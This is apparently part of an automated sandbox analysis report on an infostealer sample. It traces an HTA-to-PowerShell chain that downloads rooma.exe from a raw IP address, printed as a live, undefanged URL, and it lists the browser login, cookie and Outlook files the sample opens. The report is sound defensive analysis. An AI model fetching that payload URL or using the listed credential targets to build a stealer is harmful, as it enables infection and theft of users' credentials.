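The decoded URL, `http://20.86.128.223/room/rooma.exe`, sits on the same host as the `room4.hta` that mshta.exe fetched, and its filename matches the `rooma.exe` the report then shows being written to and launched from `C:\Users\user\AppData\Roaming`. The dispatch table also makes one quirk of the sample visible: the `.msi` branch calls `misexec` rather than `msiexec`, so that path would fail on a stock Windows install; for an `.exe` payload, as here, the final `Start-Process` branch is the one that runs.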
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation

Stealing of Sensitive Information

Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
[Legend of the report's IP-distribution map, image not included: No. of IPs < 25%; 25% to 50%; 50% to 75%; > 75%]